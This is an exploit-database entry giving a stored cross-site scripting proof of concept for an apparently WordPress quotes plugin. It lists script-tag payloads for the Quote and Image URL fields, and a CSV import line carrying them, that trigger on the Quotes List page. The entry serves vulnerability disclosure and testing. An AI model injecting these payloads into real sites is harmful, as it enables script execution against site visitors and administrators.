Share
## https://sploitus.com/exploit?id=WPEX-ID:0AF030D8-B676-4826-91C0-98706B816F3C
Create/edit a quote and put the following payload in the Quote field: <script>alert(/XSS/)</script>, and '><script>alert(/XSS-img/)</script> in the Image URL one

Also works when importing quotes via CSV:

quote|first_name|last_name|source|img_url
<script>alert(/XSS-quote/)</script>|John|Smith|'><script>alert(/XSS-img/)</script>|

The XSS will be triggered in the Quotes List page